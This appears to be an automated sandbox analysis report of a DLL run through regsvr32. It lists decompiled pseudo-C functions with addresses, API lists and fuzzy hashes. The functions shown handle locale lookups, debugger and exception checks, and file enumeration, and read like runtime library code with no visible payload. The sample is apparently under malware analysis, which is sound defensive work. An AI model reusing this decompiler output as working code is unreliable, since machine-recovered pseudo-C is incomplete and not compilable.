                                                                      				_t90 = _t36;
                                                                      				r8d = _t90;
                                                                      				E000000011800370F4(_v84, _t161 + 0x100, _t126, _t35, _t149, _t151);
                                                                      				if (_t147 == 0) goto 0x80050cce;
                                                                      				r9d = 0;
                                                                      				r8d = _t90;
                                                                      				E000000011800370F4(_v84, _t161 + 0x100, _t126, _t147 + 0x120, _t149, _t151);
                                                                      				r9d = 0x40;
                                                                      				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x80050cd5;
                                                                      				r9d = 0x40;
                                                                      				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x80050cd5;
                                                                      				_t43 = _t149 - 0x36; // 0xa
                                                                      				r9d = _t43;
                                                                      				_t44 = _t149 - 0x30; // 0x10
                                                                      				r8d = _t44;
                                                                      				E0000000118005A060(_t60);
                                                                      				goto 0x80050cd7;
                                                                      				return E00000001180002FB0(0, _t60, _v72 ^ _t151 - 0x00000040);
                                                                      			}


































                                                                      0x180050a74
                                                                      0x180050a74
                                                                      0x180050a74
                                                                      0x180050a86
                                                                      0x180050a8d
                                                                      0x180050a90
                                                                      0x180050a94
                                                                      0x180050a97
                                                                      0x180050a9a
                                                                      0x180050a9d
                                                                      0x180050aa2
                                                                      0x180050aa7
                                                                      0x180050aab
                                                                      0x180050aae
                                                                      0x180050ab7
                                                                      0x180050aba
                                                                      0x180050aba
                                                                      0x180050ac1
                                                                      0x180050ac8
                                                                      0x180050acf
                                                                      0x180050ad6
                                                                      0x180050adc
                                                                      0x180050ae2
                                                                      0x180050ae4
                                                                      0x180050af6
                                                                      0x180050afb
                                                                      0x180050aff
                                                                      0x180050b09
                                                                      0x180050b0f
                                                                      0x180050b11
                                                                      0x180050b17
                                                                      0x180050b1d
                                                                      0x180050b23
                                                                      0x180050b28
                                                                      0x180050b2e
                                                                      0x180050b37
                                                                      0x180050b3d
                                                                      0x180050b43
                                                                      0x180050b5a
                                                                      0x180050b60
                                                                      0x180050b66
                                                                      0x180050b6c
                                                                      0x180050b72
                                                                      0x180050b77
                                                                      0x180050b79
                                                                      0x180050b7d
                                                                      0x180050b82
                                                                      0x180050b84
                                                                      0x180050b8a
                                                                      0x180050b90
                                                                      0x180050b92
                                                                      0x180050ba5
                                                                      0x180050bad
                                                                      0x180050bc0
                                                                      0x180050bcb
                                                                      0x180050bd5
                                                                      0x180050bd7
                                                                      0x180050bdb
                                                                      0x180050bdd
                                                                      0x180050be4
                                                                      0x180050bea
                                                                      0x180050bed
                                                                      0x180050bf4
                                                                      0x180050c08
                                                                      0x180050c0e
                                                                      0x180050c17
                                                                      0x180050c28
                                                                      0x180050c3e
                                                                      0x180050c47
                                                                      0x180050c49
                                                                      0x180050c4f
                                                                      0x180050c56
                                                                      0x180050c59
                                                                      0x180050c59
                                                                      0x180050c5d
                                                                      0x180050c60
                                                                      0x180050c68
                                                                      0x180050c74
                                                                      0x180050c77
                                                                      0x180050c7a
                                                                      0x180050c87
                                                                      0x180050c9a
                                                                      0x180050ca6
                                                                      0x180050cb6
                                                                      0x180050cc1
                                                                      0x180050cc1
                                                                      0x180050cc5
                                                                      0x180050cc5
                                                                      0x180050cc9
                                                                      0x180050cd3
                                                                      0x180050cf1

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                      • String ID:
                                                                      • API String ID: 2591520935-0
                                                                      • Opcode ID: fdb49abeae085709f4a463679ccbeab3d91e1b8c2664baef241f20cf5486e256
                                                                      • Instruction ID: 797fa7df5129da405bf91bd424b5bec65ce7bef4852529399f87302c63cdf08a
                                                                      • Opcode Fuzzy Hash: fdb49abeae085709f4a463679ccbeab3d91e1b8c2664baef241f20cf5486e256
                                                                      • Instruction Fuzzy Hash: B67189727107488AFB929F60D8907ED37A0BB4C7C8F64C125BE1963795EF3A8A49C350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 45%
                                                                      			E00000001180003A34(signed int __ecx, void* __rax, long long __rbx) {
                                                                      				void* _t35;
                                                                      				void* _t36;
                                                                      				int _t38;
                                                                      				void* _t58;
                                                                      				void* _t76;
                                                                      				long _t79;
                                                                      				void* _t80;
                                                                      				void* _t82;
                                                                      				void* _t83;
                                                                      				void* _t85;
                                                                      
                                                                      				_t58 = __rax;
                                                                      				 *((long long*)(_t82 + 8)) = __rbx;
                                                                      				_t80 = _t82 - 0x4c0;
                                                                      				_t83 = _t82 - 0x5c0;
                                                                      				if (IsProcessorFeaturePresent(_t79) == 0) goto 0x80003a5e;
                                                                      				asm("int 0x29");
                                                                      				_t35 = E00000001180003980(_t34);
                                                                      				r8d = 0x4d0;
                                                                      				_t36 = E000000011800051C0(_t35, 0, _t80 - 0x10, _t76, _t85);
                                                                      				__imp__RtlCaptureContext();
                                                                      				r8d = 0;
                                                                      				__imp__RtlLookupFunctionEntry();
                                                                      				if (_t58 == 0) goto 0x80003ade;
                                                                      				 *(_t83 + 0x38) =  *(_t83 + 0x38) & 0x00000000;
                                                                      				 *((long long*)(_t83 + 0x30)) = _t80 + 0x4e0;
                                                                      				 *((long long*)(_t83 + 0x28)) = _t80 + 0x4e8;
                                                                      				 *((long long*)(_t83 + 0x20)) = _t80 - 0x10;
                                                                      				__imp__RtlVirtualUnwind();
                                                                      				 *((long long*)(_t80 + 0xe8)) =  *((intOrPtr*)(_t80 + 0x4c8));
                                                                      				r8d = 0x98;
                                                                      				 *((long long*)(_t80 + 0x88)) = _t80 + 0x4d0;
                                                                      				E000000011800051C0(_t36, 0, _t83 + 0x50,  *((intOrPtr*)(_t80 + 0x4d8)),  *((intOrPtr*)(_t80 + 0xe8)));
                                                                      				 *((long long*)(_t83 + 0x60)) =  *((intOrPtr*)(_t80 + 0x4c8));
                                                                      				 *((intOrPtr*)(_t83 + 0x50)) = 0x40000015;
                                                                      				 *((intOrPtr*)(_t83 + 0x54)) = 1;
                                                                      				_t38 = IsDebuggerPresent();
                                                                      				 *((long long*)(_t83 + 0x40)) = _t83 + 0x50;
                                                                      				 *((long long*)(_t83 + 0x48)) = _t80 - 0x10;
                                                                      				SetUnhandledExceptionFilter(??);
                                                                      				if (UnhandledExceptionFilter(??) != 0) goto 0x80003b6e;
                                                                      				if ((__ecx & 0xffffff00 | _t38 == 0x00000001) != 0) goto 0x80003b6e;
                                                                      				return E00000001180003980(_t40);
                                                                      			}













                                                                      0x180003a34
                                                                      0x180003a34
                                                                      0x180003a3a
                                                                      0x180003a42
                                                                      0x180003a58
                                                                      0x180003a5c
                                                                      0x180003a63
                                                                      0x180003a6e
                                                                      0x180003a74
                                                                      0x180003a7d
                                                                      0x180003a94
                                                                      0x180003a97
                                                                      0x180003aa0
                                                                      0x180003aa2
                                                                      0x180003ab9
                                                                      0x180003ac8
                                                                      0x180003ad1
                                                                      0x180003ad8
                                                                      0x180003aea
                                                                      0x180003afa
                                                                      0x180003b04
                                                                      0x180003b0b
                                                                      0x180003b17
                                                                      0x180003b1c
                                                                      0x180003b24
                                                                      0x180003b2c
                                                                      0x180003b3a
                                                                      0x180003b46
                                                                      0x180003b4d
                                                                      0x180003b60
                                                                      0x180003b64
                                                                      0x180003b7e

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 57f857841d4384ea87f373e230515e81bea9e0f2d86b705a5367033165c7fb1d
                                                                      • Instruction ID: d51b018bf9e40a19ff67940061dc91f9a4565830268e38acdb4af5d22c91b8ef
                                                                      • Opcode Fuzzy Hash: 57f857841d4384ea87f373e230515e81bea9e0f2d86b705a5367033165c7fb1d
                                                                      • Instruction Fuzzy Hash: 24313272205B8486EBA1DF65E8407DE7365F788788F44842AEB4E47B95DF38C64CC710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$,o:;$;&>$Hg<$Ji/$eO1$npw
                                                                      • API String ID: 0-1275519699
                                                                      • Opcode ID: 44c970e585e8d01518436471fbc8fe5fe4e5c1cd6b81f2993d13a71029f57c40
                                                                      • Instruction ID: 9a2dba3f604a787dd340ecdede56b83360c8a637f9e7affaeca0b87f591289f1
                                                                      • Opcode Fuzzy Hash: 44c970e585e8d01518436471fbc8fe5fe4e5c1cd6b81f2993d13a71029f57c40
                                                                      • Instruction Fuzzy Hash: 7A12DFB5504609DFCB58CF28C59A9DE3BE1FB48308F41812EFC0A9B664D774DAA8CB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E0000000118003A8BC(void* __ecx, intOrPtr __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                                                      				void* _t36;
                                                                      				void* _t37;
                                                                      				void* _t38;
                                                                      				int _t40;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				_Unknown_base(*)()* _t85;
                                                                      				void* _t89;
                                                                      				void* _t90;
                                                                      				void* _t92;
                                                                      				signed long long _t93;
                                                                      				struct _EXCEPTION_POINTERS* _t99;
                                                                      
                                                                      				 *((long long*)(_t92 + 0x10)) = __rbx;
                                                                      				 *((long long*)(_t92 + 0x18)) = __rsi;
                                                                      				_t90 = _t92 - 0x4f0;
                                                                      				_t93 = _t92 - 0x5f0;
                                                                      				_t62 =  *0x80072078; // 0xc949cbcab002
                                                                      				 *(_t90 + 0x4e0) = _t62 ^ _t93;
                                                                      				if (__ecx == 0xffffffff) goto 0x8003a8fb;
                                                                      				_t37 = E00000001180003980(_t36);
                                                                      				r8d = 0x98;
                                                                      				_t38 = E000000011800051C0(_t37, 0, _t93 + 0x70, __rdx, __r8);
                                                                      				r8d = 0x4d0;
                                                                      				E000000011800051C0(_t38, 0, _t90 + 0x10, __rdx, __r8);
                                                                      				 *((long long*)(_t93 + 0x48)) = _t93 + 0x70;
                                                                      				_t65 = _t90 + 0x10;
                                                                      				 *((long long*)(_t93 + 0x50)) = _t65;
                                                                      				__imp__RtlCaptureContext();
                                                                      				r8d = 0;
                                                                      				__imp__RtlLookupFunctionEntry();
                                                                      				if (_t65 == 0) goto 0x8003a98e;
                                                                      				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
                                                                      				 *((long long*)(_t93 + 0x30)) = _t93 + 0x58;
                                                                      				 *((long long*)(_t93 + 0x28)) = _t93 + 0x60;
                                                                      				 *((long long*)(_t93 + 0x20)) = _t90 + 0x10;
                                                                      				__imp__RtlVirtualUnwind();
                                                                      				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
                                                                      				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
                                                                      				 *((long long*)(_t90 + 0xa8)) = _t90 + 0x510;
                                                                      				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
                                                                      				 *((intOrPtr*)(_t93 + 0x74)) = r8d;
                                                                      				_t40 = IsDebuggerPresent();
                                                                      				SetUnhandledExceptionFilter(_t85, _t89);
                                                                      				if (UnhandledExceptionFilter(_t99) != 0) goto 0x8003a9f0;
                                                                      				if (_t40 != 0) goto 0x8003a9f0;
                                                                      				if (__ecx == 0xffffffff) goto 0x8003a9f0;
                                                                      				return E00000001180002FB0(E00000001180003980(_t42), __ecx,  *(_t90 + 0x4e0) ^ _t93);
                                                                      			}















                                                                      0x18003a8bc
                                                                      0x18003a8c1
                                                                      0x18003a8ca
                                                                      0x18003a8d2
                                                                      0x18003a8d9
                                                                      0x18003a8e3
                                                                      0x18003a8f4
                                                                      0x18003a8f6
                                                                      0x18003a902
                                                                      0x18003a908
                                                                      0x18003a913
                                                                      0x18003a919
                                                                      0x18003a923
                                                                      0x18003a92c
                                                                      0x18003a930
                                                                      0x18003a935
                                                                      0x18003a94a
                                                                      0x18003a94d
                                                                      0x18003a956
                                                                      0x18003a958
                                                                      0x18003a96b
                                                                      0x18003a978
                                                                      0x18003a981
                                                                      0x18003a988
                                                                      0x18003a995
                                                                      0x18003a9a7
                                                                      0x18003a9ab
                                                                      0x18003a9b9
                                                                      0x18003a9bd
                                                                      0x18003a9c1
                                                                      0x18003a9cb
                                                                      0x18003a9de
                                                                      0x18003a9e2
                                                                      0x18003a9e7
                                                                      0x18003aa16

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: ff111f5934c1fb2efb06e194db7308e8d2b3445b951978646ae1d3ac39a10f87
                                                                      • Instruction ID: 69abdbee170f78b68cc1434790b9cd0fea730458ddda0dbfd48400e1fc39f8b3
                                                                      • Opcode Fuzzy Hash: ff111f5934c1fb2efb06e194db7308e8d2b3445b951978646ae1d3ac39a10f87
                                                                      • Instruction Fuzzy Hash: 7E315E32204B8486EBA1CF25E8403DE73A4F789794F554126EA9D43B99EF38C299CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00000001180043DBC(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                      				signed long long _t24;
                                                                      				signed long long _t26;
                                                                      				void* _t29;
                                                                      
                                                                      				 *((long long*)(_t29 + 8)) = __rbx;
                                                                      				 *(_t29 + 0x10) = _t24;
                                                                      				 *((long long*)(_t29 + 0x18)) = __rsi;
                                                                      				_t26 = (_t24 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)(__rcx + _t26 * 2)) != 0) goto 0x80043dea;
                                                                      				if (_t26 + 1 -  !__r8 <= 0) goto 0x80043e23;
                                                                      				return 0xc;
                                                                      			}






                                                                      0x180043dbc
                                                                      0x180043dc1
                                                                      0x180043dc6
                                                                      0x180043dea
                                                                      0x180043df1
                                                                      0x180043dff
                                                                      0x180043e22

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$AllocateFirstHeapNext
                                                                      • String ID: .
                                                                      • API String ID: 4087847297-248832578
                                                                      • Opcode ID: d61697b1c49ecfcc66f29084c78ca6cff4f8976f2976917ec775d2939e22d3a2
                                                                      • Instruction ID: 3b14a028af9c5cb70e0737b7dea0a272d961ab28cb8b5b648fb282a7d337530b
                                                                      • Opcode Fuzzy Hash: d61697b1c49ecfcc66f29084c78ca6cff4f8976f2976917ec775d2939e22d3a2
                                                                      • Instruction Fuzzy Hash: C1813972701A4841EBA2DB22E8853EA63A1F348BE8F45D625BF59477C0DF38C25DC304
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E0000000118004383C(void* __esi, void* __rcx, intOrPtr* __rdx, intOrPtr* __r8, void* __r10) {
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				intOrPtr* _t77;
                                                                      				void* _t94;
                                                                      				void* _t95;
                                                                      				int _t97;
                                                                      				void* _t108;
                                                                      				void* _t111;
                                                                      				void* _t120;
                                                                      				void* _t124;
                                                                      				signed long long _t152;
                                                                      				intOrPtr* _t154;
                                                                      				intOrPtr _t160;
                                                                      				void* _t174;
                                                                      				char* _t180;
                                                                      				intOrPtr _t181;
                                                                      				intOrPtr* _t193;
                                                                      				void* _t197;
                                                                      				void* _t204;
                                                                      				void* _t205;
                                                                      				signed long long _t208;
                                                                      				void* _t209;
                                                                      				void* _t210;
                                                                      				signed long long _t211;
                                                                      				void* _t222;
                                                                      				intOrPtr* _t223;
                                                                      				signed long long _t224;
                                                                      				long long _t227;
                                                                      				intOrPtr _t228;
                                                                      				void* _t229;
                                                                      
                                                                      				_t222 = __r10;
                                                                      				_t209 = _t210 - 0x240;
                                                                      				_t211 = _t210 - 0x340;
                                                                      				_t152 =  *0x80072078; // 0xc949cbcab002
                                                                      				 *(_t209 + 0x230) = _t152 ^ _t211;
                                                                      				_t223 = __r8;
                                                                      				_t204 = __rcx;
                                                                      				if (__rdx == __rcx) goto 0x8004389e;
                                                                      				_t77 =  *__rdx - 0x2f;
                                                                      				_t120 = _t77 - 0x2d;
                                                                      				if (_t120 > 0) goto 0x8004388e;
                                                                      				_t154 = _t77;
                                                                      				asm("dec eax");
                                                                      				if (_t120 < 0) goto 0x8004389e;
                                                                      				E00000001180055798(_t108, _t111, _t154, 0x801, __rcx, __rdx, _t205, __r8);
                                                                      				_t193 = _t154;
                                                                      				if (_t154 != __rcx) goto 0x8004387c;
                                                                      				r8b =  *_t193;
                                                                      				if (r8b != 0x3a) goto 0x800438c5;
                                                                      				if (_t193 == __rcx + 1) goto 0x800438c5;
                                                                      				_t218 = __r8;
                                                                      				r8d = 0;
                                                                      				E000000011800436B4(0x801, __rcx, _t193, _t205, __r8, __r8);
                                                                      				goto 0x80043b68;
                                                                      				r8b = r8b - 0x2f;
                                                                      				r14d = 0;
                                                                      				_t124 = r8b - 0x2d;
                                                                      				if (_t124 > 0) goto 0x800438de;
                                                                      				asm("dec eax");
                                                                      				if (_t124 < 0) goto 0x800438e1;
                                                                      				 *((long long*)(_t211 + 0x40)) = _t227;
                                                                      				 *((long long*)(_t211 + 0x48)) = _t227;
                                                                      				 *((long long*)(_t211 + 0x50)) = _t227;
                                                                      				 *((long long*)(_t211 + 0x58)) = _t227;
                                                                      				asm("dec ebp");
                                                                      				 *((long long*)(_t211 + 0x60)) = _t227;
                                                                      				_t225 = _t224 & _t193 - __rcx + 0x00000001;
                                                                      				 *((intOrPtr*)(_t211 + 0x68)) = r14b;
                                                                      				 *(_t211 + 0x38) = _t224 & _t193 - __rcx + 0x00000001;
                                                                      				E000000011800397D4(r8b, 0x801, _t211 + 0x70, _t193 - __rcx + 1, _t205);
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x78)) + 0xc)) != 0xfde9) goto 0x80043944;
                                                                      				if ( *((intOrPtr*)(_t209 - 0x78)) == r14b) goto 0x8004393f;
                                                                      				 *( *((intOrPtr*)(_t211 + 0x70)) + 0x3a8) =  *( *((intOrPtr*)(_t211 + 0x70)) + 0x3a8) & 0xfffffffd;
                                                                      				r9d = 0xfde9;
                                                                      				goto 0x8004397c;
                                                                      				if (E000000011800369DC( *((intOrPtr*)(_t211 + 0x70))) != 0) goto 0x80043967;
                                                                      				if ( *((intOrPtr*)(_t209 - 0x78)) == r14b) goto 0x8004395f;
                                                                      				 *( *((intOrPtr*)(_t211 + 0x70)) + 0x3a8) =  *( *((intOrPtr*)(_t211 + 0x70)) + 0x3a8) & 0xfffffffd;
                                                                      				r9d = 1;
                                                                      				goto 0x8004397c;
                                                                      				if ( *((intOrPtr*)(_t209 - 0x78)) == r14b) goto 0x80043979;
                                                                      				_t160 =  *((intOrPtr*)(_t211 + 0x70));
                                                                      				 *(_t160 + 0x3a8) =  *(_t160 + 0x3a8) & 0xfffffffd;
                                                                      				r9d = r14d;
                                                                      				E00000001180043160(0xfde9, 0, 0x801, __rcx, _t211 + 0x40, __rcx, _t205, _t209, _t211 + 0x30, _t218, _t222);
                                                                      				 *((intOrPtr*)(_t211 + 0x28)) = r14d;
                                                                      				 *((long long*)(_t211 + 0x20)) = _t227;
                                                                      				_t174 =  !=  ? _t227 :  *((intOrPtr*)(_t211 + 0x50));
                                                                      				r9d = 0;
                                                                      				FindFirstFileExW(??, ??, ??, ??, ??, ??);
                                                                      				if (_t160 != 0xffffffff) goto 0x800439e5;
                                                                      				r8d = 0;
                                                                      				E000000011800436B4(_t160, _t204, _t211 + 0x40, _t205, _t209 - 0x20, _t223);
                                                                      				if ( *((intOrPtr*)(_t211 + 0x68)) == r14b) goto 0x800439de;
                                                                      				E0000000118003A674(_t160,  *((intOrPtr*)(_t211 + 0x50)));
                                                                      				goto 0x80043b68;
                                                                      				_t208 =  *((intOrPtr*)(_t223 + 8)) -  *_t223 >> 3;
                                                                      				 *((long long*)(_t209 - 0x50)) = _t227;
                                                                      				 *((long long*)(_t209 - 0x48)) = _t227;
                                                                      				 *((long long*)(_t209 - 0x40)) = _t227;
                                                                      				 *((long long*)(_t209 - 0x38)) = _t227;
                                                                      				 *((long long*)(_t209 - 0x30)) = _t227;
                                                                      				 *((intOrPtr*)(_t209 - 0x28)) = r14b;
                                                                      				E000000011800397D4(_t160, _t160, _t209 - 0x70, _t211 + 0x40, _t208);
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t209 - 0x68)) + 0xc)) != 0xfde9) goto 0x80043a39;
                                                                      				if ( *((intOrPtr*)(_t209 - 0x58)) == r14b) goto 0x80043a34;
                                                                      				 *( *((intOrPtr*)(_t209 - 0x70)) + 0x3a8) =  *( *((intOrPtr*)(_t209 - 0x70)) + 0x3a8) & 0xfffffffd;
                                                                      				r9d = 0xfde9;
                                                                      				goto 0x80043a6f;
                                                                      				if (E000000011800369DC( *((intOrPtr*)(_t209 - 0x70))) != 0) goto 0x80043a5b;
                                                                      				if ( *((intOrPtr*)(_t209 - 0x58)) == r14b) goto 0x80043a53;
                                                                      				 *( *((intOrPtr*)(_t209 - 0x70)) + 0x3a8) =  *( *((intOrPtr*)(_t209 - 0x70)) + 0x3a8) & 0xfffffffd;
                                                                      				r9d = 1;
                                                                      				goto 0x80043a6f;
                                                                      				if ( *((intOrPtr*)(_t209 - 0x58)) == r14b) goto 0x80043a6c;
                                                                      				 *( *((intOrPtr*)(_t209 - 0x70)) + 0x3a8) =  *( *((intOrPtr*)(_t209 - 0x70)) + 0x3a8) & 0xfffffffd;
                                                                      				r9d = r14d;
                                                                      				_t197 = _t209 - 0x50;
                                                                      				E0000000118004330C(0xfde9, 0, _t160, _t209 + 0xc, _t197, _t204, _t208, _t209, _t211 + 0x30, _t222);
                                                                      				_t228 =  *((intOrPtr*)(_t209 - 0x40));
                                                                      				_t180 =  !=  ? _t197 : _t228;
                                                                      				if ( *_t180 != 0x2e) goto 0x80043ab4;
                                                                      				if ( *((intOrPtr*)(_t180 + 1)) != 0) goto 0x80043aab;
                                                                      				if ( *((intOrPtr*)(_t209 - 0x28)) == 0) goto 0x80043adb;
                                                                      				_t181 = _t228;
                                                                      				_t94 = E0000000118003A674( *((intOrPtr*)(_t209 - 0x70)), _t181);
                                                                      				goto 0x80043adb;
                                                                      				if (_t94 != 0x2e) goto 0x80043ab4;
                                                                      				if ( *((intOrPtr*)(_t181 + 2)) == 0) goto 0x80043a9c;
                                                                      				_t95 = E000000011800436B4(_t160, _t181, _t204, _t208, _t225, _t223);
                                                                      				r13d = _t95;
                                                                      				if (_t95 != 0) goto 0x80043b3d;
                                                                      				if ( *((intOrPtr*)(_t209 - 0x28)) == _t95) goto 0x80043ad6;
                                                                      				E0000000118003A674( *((intOrPtr*)(_t209 - 0x70)), _t228);
                                                                      				_t97 = FindNextFileW(??, ??);
                                                                      				r14d = 0;
                                                                      				if (_t97 != 0) goto 0x800439f2;
                                                                      				if (_t208 ==  *((intOrPtr*)(_t223 + 8)) -  *_t223 >> 3) goto 0x80043b1f;
                                                                      				_t69 = _t228 + 8; // 0x8
                                                                      				r8d = _t69;
                                                                      				E00000001180054C50(0, _t160,  *_t223 + _t208 * 8, ( *((intOrPtr*)(_t223 + 8)) -  *_t223 >> 3) - _t208, _t204, _t208, _t209, _t225, E000000011800441B0, _t229);
                                                                      				FindClose(??);
                                                                      				if ( *((intOrPtr*)(_t211 + 0x68)) == r14b) goto 0x80043b39;
                                                                      				E0000000118003A674( *_t223,  *((intOrPtr*)(_t211 + 0x50)));
                                                                      				goto 0x80043b68;
                                                                      				if ( *((char*)(_t209 - 0x28)) == 0) goto 0x80043b4b;
                                                                      				E0000000118003A674( *_t223, _t228);
                                                                      				FindClose(??);
                                                                      				if ( *((char*)(_t211 + 0x68)) == 0) goto 0x80043b65;
                                                                      				E0000000118003A674( *_t223,  *((intOrPtr*)(_t211 + 0x50)));
                                                                      				return E00000001180002FB0(r13d, 0xfde9,  *(_t209 + 0x230) ^ _t211);
                                                                      			}



































                                                                      0x18004383c
                                                                      0x180043847
                                                                      0x18004384f
                                                                      0x180043856
                                                                      0x180043860
                                                                      0x180043867
                                                                      0x18004386a
                                                                      0x18004387a
                                                                      0x18004387e
                                                                      0x180043880
                                                                      0x180043882
                                                                      0x180043884
                                                                      0x180043888
                                                                      0x18004388c
                                                                      0x180043891
                                                                      0x180043896
                                                                      0x18004389c
                                                                      0x18004389e
                                                                      0x1800438a5
                                                                      0x1800438ae
                                                                      0x1800438b0
                                                                      0x1800438b3
                                                                      0x1800438bb
                                                                      0x1800438c0
                                                                      0x1800438c5
                                                                      0x1800438c9
                                                                      0x1800438cc
                                                                      0x1800438d0
                                                                      0x1800438d6
                                                                      0x1800438dc
                                                                      0x1800438e4
                                                                      0x1800438ec
                                                                      0x1800438f3
                                                                      0x1800438fd
                                                                      0x180043902
                                                                      0x180043905
                                                                      0x18004390a
                                                                      0x18004390d
                                                                      0x180043914
                                                                      0x180043919
                                                                      0x18004392b
                                                                      0x180043931
                                                                      0x180043938
                                                                      0x18004393f
                                                                      0x180043942
                                                                      0x18004394b
                                                                      0x180043951
                                                                      0x180043958
                                                                      0x18004395f
                                                                      0x180043965
                                                                      0x18004396b
                                                                      0x18004396d
                                                                      0x180043972
                                                                      0x180043979
                                                                      0x180043989
                                                                      0x180043999
                                                                      0x18004399e
                                                                      0x1800439a3
                                                                      0x1800439a7
                                                                      0x1800439ac
                                                                      0x1800439b9
                                                                      0x1800439be
